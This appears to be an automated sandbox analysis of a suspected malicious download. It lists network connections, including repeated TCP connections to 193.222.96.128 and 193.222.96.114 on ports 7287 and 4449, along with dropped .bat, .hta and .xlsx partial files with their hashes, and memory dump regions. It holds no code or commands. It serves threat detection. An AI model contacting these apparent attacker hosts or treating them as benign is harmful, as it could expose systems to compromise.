US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 72.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:4449 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
NL 193.222.96.128:7287 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
US 8.8.8.8:53 114.96.222.193.in-addr.arpa udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 www.virustotal.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp

Files

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\activity-stream.discovery_stream.json.tmp

MD5 693ff32e4cd773f59817c7b3639281b3
SHA1 60051804fd3d8ffd383a1231f1ed6ec5a0e0b36a
SHA256 460980fc6371a63ae9ed9d780e92bb009b5d89e6ea58e8d6b2dc1f349e2f7fda
SHA512 9f83776d152be6a6c0adf5190aef88a03b4e2048544f5cd1188d836e1e4dfcf8661de1158d7dcffedaa7bc6e0e7beb32733cb9597842a0015338d2d577a79197

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs.js

MD5 79a5f7718408e1c574181045c3006fa4
SHA1 9c84a78d7f434cd6df4ed2ca621cffa21bed9bd6
SHA256 2e8ff6d17d34689bee6a4c4554f1bf74394c64006c99cadfadb9ab7bf3c2d35c
SHA512 040b9be08a0d9d9904d79e5f8ea8f6dca5a5c5d2f8f6dbbb80b7637407ecf53aa9537286e9b17d15737284e67e7b9b2c9a7e67f4fb6764422dd7b23aa228db64

C:\Users\Admin\Downloads\15.9xj2mza4.bat.part

MD5 35c6d717dae5b57fdaf92e00d1002b73

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\17\{8be4014a-62d8-4330-bb78-778b8d3d5911}.final

MD5 dc39bb15088b2cfffa61a730af3d6a10
SHA1 b11122d4cbd955a42b280103ec69af72a3ba9729
SHA256 c43f689d3ab62a0e193ffe0d02b3f0a3bff6fff0c429f1fc5ded8e485a4233a6
SHA512 be28bdfbf733a3fb4dce172df8185dbf7a7ecec3325869fa6046517c81c9c9c514c65bc0edbe0ce8eb25f3c8fc0afbf5d3e72e0ff53eb4f29ba0d5c3b39d47fe

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\31130

MD5 b2d2b1fae6e942a858e8820e7bc07a28
SHA1 340556b031087667a056b62d295fb1c8156db31a
SHA256 b1af872af072aaec6d409a3f89cfc73fed7d161109356f1dbfdc1e9500241fee
SHA512 0f508b3db6d793b46676c1997027551832c296e1d1a815a45a5c9008ae7c4a925b92a5a6eba24b41b935ce104804a8217602c21165fc088be774b92e4bf4a6c2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1686

MD5 da38b76627e1046a91402a9c642de999
SHA1 1c8f10f85d640026f20f8364b0a220c62f914039
SHA256 7b50949d3ae182c10089e30a7d2f380ce0ee553f31acb9f30ecb8a1ced20bb14
SHA512 7b28bd407a85c4672c0f457c016960ebed13d3e0bb48d978b60f80ca0914f8db683cfdfe35d0a814a2eaea27aaa432893cdca4424cf749fdeca6280c01540c49

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\16504

MD5 5eee27270bdf5fbd329680773c23a286
SHA1 4d9f47646a686fbf9cedbd677d14444e4c46a83f
SHA256 6f1b09ef02bb1c0fb3f81dddb09edac7635a372c9b7198de68b967b6411fdb44
SHA512 20c76518645da2eace82723d0c0024cce3584f14d4f3c128b02cfbe6d40909672cf073aaac3ebcab7896b0f3a164074042a2b59f579eb5310e1e5520c8827ea7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\138\{e8cf76c9-df00-4f16-b07d-c36de2661c8a}.final

MD5 61458212bf04ff538a05939e4336f7eb
SHA1 e6568de7b1242db3fa723208ea0cba0d5eec0630
SHA256 ec21ed938b96957814df264016c6736204b7972bde1cb0000ba7b54ac4051ef0
SHA512 e16508a34e7a4987268de0a9d3c93a9c1cfde481db27250c20124ff7ba02cd9a13f7b8c3ecad322504e880ee4a53034b2a90bdacf5790b00aa561dbdd13b09ad

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\32081

MD5 04c829d9520d56fbb7f4b1c065e17c2b
SHA1 a54c2c354364fc8d04846a94ad07a0d84357fb64
SHA256 7c882bb956bcd3a20d618c8a701767b2e39cd3393f029104dcaa6fd44ed6291f
SHA512 2ad6abf084ec41abaf815d426812cda1b57d1764c14ca4870a298e297d93896caf0487e549c7044e39f0a2682201c93438b3d2de250c0a41c6d51678433758ef

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 28a50d3f545282dabeec13cdc08944bd
SHA1 b6b77152026d4375ce3a4586c0b2a06c20c8f1ac
SHA256 6681700b93231e4ed47a070b35811cdffca7460c878bebef8eb73a1726eae333
SHA512 e94001f94a91d2ba75ff75b218d738631fe1e9c0841646a9d6cd2c4b3bb8e14e094d3d509365b0da311fbd8aea7c04ff02657407c82464ef47e1798c1eaba888

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 6be25f375720f23b64282112101ab42a
SHA1 4e24effead66fdeb599618e04c417eda2790eb36
SHA256 cbcb3df641e71f8e67010c5257721905eefbff44c383c62df74cfae0288e24f6
SHA512 390af8a43a0c0797da6b965a15754a4611cf142eaccca92da6088678a6fdab29ae685d9a2d2d971253c42adf5d9d6920a422253c0bf937aaf9d00bc1cf65a245

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 c1c361b9e5c1b336b7eda876579f7595
SHA1 3bbb43e4433e82009003c6e21b1396ea0df8d179
SHA256 76863fefd9f82bba6335845297e98c765e45ff333bb15ec4b6dea8ebb1300a8a
SHA512 8b625447ca37cd8037d1372917fa3e7fdb771dc6d0bdd6c019f7e69294fa65b4c60a5e864c14799f9c29a258ade98fdc5793476e77c3e352daabfd5a351b6226

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\jumpListCache\8scUkgTJ77iYHxZ7zE4eXg==.ico

MD5 a3c1306e53848dce3a3c2fec6e1cdff2
SHA1 87f8463535c624202f9b6efe26e993b0b1f3157c
SHA256 d2d32f8573ccc7ad555d258c8362cfb0b699eb4b004f93dbeb171f3510df055f
SHA512 871e877c73990e372a7a41d9851e9dcf301efdc543696aa4dbc35b8a121e24b7fcdf76d426b5f90fa3a14253440697de01ffa0d82d417e5490560ce7d9740aa1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\32\{be847667-ca5a-4679-b616-67e4d728cc20}.final

MD5 a316a915798ea49e5c98cd33a94e91fd
SHA1 98834276749fc0fb8d7e8574e009d7c4a43a3087
SHA256 41e6c1ad3feeb23ba89322eafadc8ef00b251ea12201084f42e4287b5e49fd5b
SHA512 386e25c6ace4944a8c169e1e4ef96d047a5ce24a7455fc4c780fedb6e2673e9542202760824bd99cc69a90d18b095bac28fda7a1efd1c6683820231ef5912172

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\10629

MD5 c93aa72c573458c7a0e63d80b52bc5ca
SHA1 a4832cee143ecb9c96e3880c46f7560617c1399f
SHA256 2e01a1d010fc2ab5cade6a81c0fdd2e5956e663a314dbfabcee87a099293196a
SHA512 8fee5a4140f2ccfe15b50de550a5d9e0c0bd94206fe303402a636e2160d6ae0046e77877b46383ca8a554ef8f02244b2539174bf9bf657176d7bd6b7c8f4f540

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\126\{da2ed82e-ef2f-46ce-82ab-d8f47bcdfd7e}.final

MD5 78e73a8b3de45edc08c08c00a6473e7d
SHA1 a111e068c32a10cd921f382a6a58f853d663effa
SHA256 b3a33431e23df376be0ac18f54dce354747bf8b31daf7376828ffb2ccd10ac6b
SHA512 fa8f278af8018ca8a6b19a75c445dc0a68ddc26c200274351c2844266f232d6f90fe234339263866e373b407229bcb585c62f34125f195221ad05a84d34971ba

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\29348

MD5 e822089dc52c73747400e715d319f8df
SHA1 9c6b19a638b655d65acc223b6fc3fd6d008afd51
SHA256 58bb5b739990ae5f1365bdc60ec25eb1f5edc767a6e3747886de6c0c5c3a407c
SHA512 09a5487be4f6d10a97d0769c3c5acc143d9f06ab110511cf9c5b4fcede3b1a3994bf10fd9e4a86cce16caeb399c65b59b1a659ba628c6d9e7b03b27b30737852

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1927

MD5 b4e0470b2e64e60f370de6765695bb18
SHA1 92b943e82ab47b99ffd2921458f884a67af9809a
SHA256 0e9fcd4671396be4cbe2899e5162b6e7cf992a92786112d9b9b7937da57fd1d7
SHA512 675839d66da5d26fe93b33a517a963c05d44f09d28ffdcc8a4310826cd47b57c9ff8fe3b2f7468ab48969c6cf88f721ad2f99186cdb19361cd23e1a7d623ed45

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\10176

MD5 7a60d8b0e3759fbc6ec306b3c8d04c78
SHA1 36865967b750c54914098e80f242b39978531a97
SHA256 c8c62348b813616bb1bfc39ee5620e62f89d8d24762987ad340b27322e8fbc32
SHA512 c8b29322af0256dc5912103d428b36a2bcbbcfd561360e1cd4b7f320e69f9f0fbaa26c7d9a00b7970cb2d51338b866a6610c07f0bb3fc08b11926f49a5e6901a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\11583

MD5 98615b4967d62c26cc772ba98b50db2f
SHA1 83b42bdd47f581b737f979aa3f92ad43cf5a6fad
SHA256 7476f23807696d1f78796fa3eb59daf5ffc83fbbda577a62bc903c21494d3af9
SHA512 103a1979b16bb3266156cbd27922eb923825e344e5cc25528bc12919df9a3bd4d07ef2308c347d3429f98a3617e754e464566870cb8920d8d7b02ac0856e5b32

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\28956

MD5 ad856332d608fb825c78737bd6201d4a
SHA1 9c36506de2f5a11b07b4ddc86ded7351e76766a1
SHA256 d0d20f9c883d9290916373d336b899d467200c32b882bf9ce86c1cb543bb2c75
SHA512 2af4ea021a2e700cd2a03eb2432907cf0c06ca95813c18eb9dc43dd2db3da7fd368aec2d718a79fe5a8f31f871a4d509238a919fe5245e62c68bb1687da0d52c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 4f7228d279b4e1ce618a25656f1c828d
SHA1 f6512df640896f416c9b75f3ad0209f8598eb45e
SHA256 5519bd54ed28894a7c57418737aa80e87286bb1bb0cd3ef7df9bdd155bfe1482
SHA512 99c1feb821e1b7929c67caf1092fc0cb7d8582315f4ab1566ded05f2dcb17e8ca8b381a0e70e7e4bf31341c8967b609d1cbb12621019489d7779352145d6c5a6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27659

MD5 8bb9dac2f7f102b29d3745803998ccd5
SHA1 63977919d88e0e97fb0ef6fda49f18fae1a57d48
SHA256 2a9e36b4facb53a284050875abcdcd7c2faed090ff99520e95a5a4354bb6331e
SHA512 1b3ccdabc0fd58acad886d75bb60ec133989f2e1dce146bf7d48fb60a1fc03ea3adbf951192bb8ab7a841f2878eae946132ce03ae3e19331ee8d57fe1baf7b20

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15192

MD5 f8d695413f1fe9641797e0f7ec545bc3
SHA1 e72c5f9fdb067895853aedc1a65c383e859bb87e
SHA256 083688293eebd40747eb25aaa83cf579990f2f9278334ebc6b15275400e53f36
SHA512 a3770551407b43b42f3d056681b4baa723ef685beecc8164673e798e368f642dfa6e2d48b237f1a8c3d3df18612aea66e592bb1d6ef1c54cabbc6b3c5310e81f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\19529

MD5 e6c957d66ac579ed3e8e4c8cf8cbbec5
SHA1 7006663631dd46f07bad2421ab80bdfff199e8c9
SHA256 aade998132f294e2f51f2cf1a8700f431beef00125bfc8e78642b998830891d8
SHA512 cf4cdd45a8d1b4c0b6b37800d8c77b8031da4492c9ea947c1577336e421d9e6fa822f3dd0a1542d1715245c4435920d5933dd7221e06d66af23eef76e76bfda6

C:\Users\Admin\Downloads\index(1).rYpCE9o6.hta.part

MD5 dbc5a204c56d2c6c974bb9ce287978d4
SHA1 dca280ec6fcc06611132200b78bf9e7bd66504ef
SHA256 d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
SHA512 6d169c338630b22fac4d68a35c03e48c990c467423829077c0689acfc12e462d1f9736c0b14146a85ade55c8ee775d06b6c4903b44287421a98b04a2bbdf60ea

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\141\{2a0fe0e9-013f-4c38-9950-f9777ce03d8d}.final

MD5 94f20609ac3b2eb44fbca281b03859e1
SHA1 fe1b485cd29efbf3c7ba4237129c9894598faaa4
SHA256 fcac86fc4783b4d62730ce65a45e1fd6a1c0cd08ff8b8ddeb332e45ec9efda84
SHA512 8e6d3709ef08638488e652256c9eeee1b852e4a1190e2515d3b8c7cbb0916b4b050322de9226b49a039bfd265551448319d3601885c5186e043c56d142d358df

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4919

MD5 d453fdaef2a2f5f89922ec8ae4af114f
SHA1 eca42de2966627f60526aba4061b4b0c81c105d6
SHA256 0a4515709df398c54db30f08908bd63b03c6d1492426032722b5915a432d8f28
SHA512 e93be16d17adc00c714a80f70c0339550979fe7b7696a97b48c396b37c23bd7703d1f30dab7a3aa7f3408f11e32be7539b4fe0cdd04b6694a22aef3b8c7b838b

C:\Users\Admin\Downloads\GoGi.NLu_0hEx.bat.part

MD5 dec0c1137005d80ff2dcc74c11639821
SHA1 60ea4490fdb0250d0f3a7c02a3a5e348a109d5f9
SHA256 06275239e40d00a87e3e16f811fc37f300184177b3f27828ad71bf6c866a71f5
SHA512 b068e2050e2bf4a20d2422cf24e10bf69798d020fca0b5c0139fe6756e92a92df6f89f33f74e69cf14d1d7f3e41aba7de90e9101d29e8786bf7093d7a2592660

C:\Users\Admin\Downloads\GoGi.NLu_0hEx.bat.part

MD5 cab2108a81d68104dd9b15efcedf8351
SHA1 03852c18f75cad87f71693fb1973d9a04e8910ed
SHA256 a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa
SHA512 e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5

C:\Users\Admin\Downloads\DzGtgj0u.xlsx.part

MD5 dfa28ceef932c1605d40981a5023dab0
SHA1 a6e8c5cdd144cb27685198fecad8f9def48dfbe8
SHA256 9e0bac9938b4059f69ed52af74337c38c242213ecd432746a483d44e1e74dff6
SHA512 28bc8a4c30e566a60280b194f5442c160f0b9c8b3dd10fa8d321035e7a3b76271373274b0d25bb8f04ac213f4293f3bde7ee8c6ff7d77caa2a4ba5276e0ccc80

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\30543

MD5 91c13f8aa0911dd87b69387eeced956d
SHA1 cd1741494b886ff634d48f9b509745471867750a
SHA256 b432eeabdeab4f253301b20c30efd7cdb53a21f6483fc7dbf6aab1260b6a0686
SHA512 65a1da79752cc729c3b7451fa7d8bc969f602010f3f3dbefb018b3b8fc53282a421ddd0461f49002b60a2bc2298cba8c2bf3267c2d0ac37846de87b0baca27ef

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\17055

MD5 5343408069f021cfd16a163c09828c2e
SHA1 20ed964f8825ec5bb2fbc132b68ca12c636c19cd
SHA256 3b3c69b9e6c2cba226c8ecfc6819c7a3b3707193230909e30aebd6ad8abb4063
SHA512 c0071cbea8fda8dc87d08061858b148a05f26b7b33982005bf2f8c39e8c10078cdb84f9ce903528f9ec8094188f78f844b45e86db3fc47fc24941f9bc41de907

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 ef680d343ff5252988f773266a176f67
SHA1 fd3d7a60d06a31dd5f536624a9427abac1f2deb4
SHA256 3a1535a9ecf04959af1a05ce8797628f879be947564ff9738bed1e2bd518d5e6
SHA512 0f23b958f473ca1044dd4110d5e0318337fa6b99ad62b0488cb08d9a44d52ae5e3dbebb43a5978002e44d750ca6e3c407fee16a99f9714205899d30830c7e126

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\20506

MD5 89be9219021a8e65d7f202eece918dcb
SHA1 9babd7976d20b4f38369fde1adf667fe4004df00
SHA256 0974174b8f072c2c405d0103fd9deb91f4fc63e70be2e121a02624bb2f3d58c1
SHA512 b5894ffde293c21c3a3c93db22fbce1dd361ca68c0ed25418afe03b92c12d70dff78f251107a4dd90d40d8a0db6f704b8fac728ebbedcdc33ccf402812f3753a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4026

MD5 67a520eedaab2d42dcf01c75827f408e
SHA1 c1328efe062bf82a2b040628eb1e95fa168d53ef
SHA256 10a50d592b405abc661e3fd684211f9aeb54ff2d505f1e5e41091845633c91b4
SHA512 43d6289f02cf3308a901ed4a2037e87552633745e532c27aaebb86a72a2693b75c6881592d2e92385edf70cee14247e21589614c5ff663bffefca639257015be

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27156

MD5 50ee6c8d2530692949e48d9155de6577
SHA1 4d07486c346242ee9af1e3fa8a7eb8be75f1684c
SHA256 4d29d9b0270b85bddb772bd110b840f7ae5e3b981f8fd84babf4d6a7538ac1c1
SHA512 992656f601c31c399a2921c1bde4e222a6d04014ba9b36724a8d80b3bc233045fb1ff2c2692b1702bd982fe61d8e23c555c25af8698780b8f52e1fc59f31d19a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\9\{b4909cd2-7ec4-4b3a-a4ad-7b154a85a209}.final

MD5 292a587101f8f12d5a31a4afdd1ace9c
SHA1 f8a7d0b03416f43a1ace59b1dc77b4acc7123389
SHA256 8a02dcfad0519edb3da976edbd23a4fd2fd49ab87321011651287e35b6036563
SHA512 6ae668092d673ae90a03fac533cc92c0fd7c0b54f6aee267f2ae99842e554e2660b10599d30bfc5cbaf6902873f5a23e6dddc393d81b5a2ddd0b514371b93e9f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\2876

MD5 e652f940d0aa29aeb1e3f005c219caa5
SHA1 ff0d2916279d5110aedd983263971397e6eacb59
SHA256 efda3db576be1a63155cbf87d6ece6b1923a53ae1c2b9f677d4658d2bf4ab463
SHA512 f2a7ebed61e3a699dc04c0d775a01170f6c8606b1b9ff016e5d2b4c0a7a8c378c6e8854ec7f5f838ace62feee7997af48c6ed455b6940d9449c8afc00337d01d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a441ad907a3fe989221c43a7519a9039
SHA1 f42ddcc55a59019bab05abda27880274b9bb3fb5
SHA256 5644b7d2f9dbc6c25be2ed4b290ff44f9e22ca98dbc6a7b785fe31b0bcb03140
SHA512 ff2bb74778d1dc85459e3df83d81e5f1f22aa2533b45dfd366ddb3c99cb388937e1043264e4712a94bf9eeeaa4a728b37a826e79da74b7f8a7eb3ddce3d4fa48

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\6516

MD5 4d713ce24637240ab400445043f13fbd
SHA1 ce6ef653f268e34091e4f6bc51413779cfa4ef17
SHA256 078d5819c5497e7948c4c8b41acfb6568d9a8c252234443697ed61c603468751
SHA512 045b11b586d463782454417e0edebef87c32acb697effef20c9447241846c14ebc5872008b3f690efb6b1a65e6fefe5507110fa4572a27985e85d650671640b0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\EDF4BF647A47A8CCC2D2ABF030AF096FE5297F89

MD5 2454c6d66dd804c49fb36ca40051f6c3
SHA1 3a263bd9cbd17e8ff03fa27ca566e20f39ca3d90
SHA256 55a755a7b0d98856af8ef24e09d069dbbbd166f8049dde00d1780c410baffe3c
SHA512 207f613e894db86dbf56c853f58baa0ce0212faff8055b296cc8d8d281ec619273767503a1e082923e5e7b024b5c78bb35b87c436f67217c5a8869a69e6eb94a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\152\{e1232316-9b19-4f92-8f72-958817e81898}.final

MD5 1e312b0c2cc8e578d800e240c808594d
SHA1 d5cfaab1e3286e4465d5276292c8fdaf851bfa76
SHA256 e94dab06d9360836eb77c6f15bc9233c38ac505feeb6de2054c983e52fc292a1
SHA512 a38ca2c4211179431eabb9ac5fe5f00191901e1a7bc905b46203276cce5149be727b4cb7799169fcfd024b45821f2e77168239fad2f3a2fc2573241aaed388e8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\23988

MD5 32c5f85ce9bcb440b54010fe59f892b4
SHA1 b088969f4b8ad94056d3852968c5c18afb5739c3
SHA256 e7f004dbd137da5d6a7f3831da66d699a5b35cf861d68028626392a0f5a6c40f
SHA512 2378860239434ee2b0d5f892c0fc4d2cbb1119d4ef7e20533513ee0b58cac0981440d1b5fd992892fcf88bae21e841144adfd927e89b146c3e130c7535fd8fa9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\14160

MD5 6d6cf93a9fe5c69307078053c4dad92f
SHA1 35091a8566d9dcdfcab6ee39f8f19abc4df91209
SHA256 163bdb7fc5e7b78ccb3a09fdd55396772d7f0a42eda9fc22c606c282d5b8847f
SHA512 5096ad7641e71278a3daa284c040f66051139db91c9d4d435d249f72437ccf2d11e8315260c67c603e22a54ecc33c82619c11fe2e3cc3b5a193adfb3675915dc

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15552

MD5 a54ffa0833b9cb58a00039b8ea1d5b22
SHA1 55618017622b1f740870eaecb7b51993e6ec5df3
SHA256 deee7c5e0c00b21f84ab0dc0733904c5b76da343248b255d14b0e85640b69337
SHA512 7322cd9ff59fc977dbbbc6b7c22506dae81ae2c532b5d6d0bb5dc0ca6a5989187bca285c671af257278278759b23250ad88d476e4493dde73dddcbb4a5773e74

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 f01839c17bd852e051fd1db81669e299
SHA1 569aac369b43fb28f5aa756a67358bd91470bcbc
SHA256 99f146da5ee11cb5c83ba6ad7bb561c31c506668f1503ffc834151bb556d800f
SHA512 e35e6353f54902c5b1ac4d6547c552256faff753aabe8c0142177287b94571476b0358a59d1b7ded87c995300c6ec949068c3c5e4629b8c1f57af00455072ba9

memory/3864-1985-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp

memory/3864-1987-0x00007FFC91070000-0x00007FFC91265000-memory.dmp

memory/3864-1989-0x00007FFC91070000-0x00007FFC91265000-memory.dmp

memory/3864-1988-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp

memory/3864-1991-0x00007FFC510F0000-0x00007FFC51100000-memory.dmp

memory/3864-1993-0x00007FFC91070000-0x00007FFC91265000-memory.dmp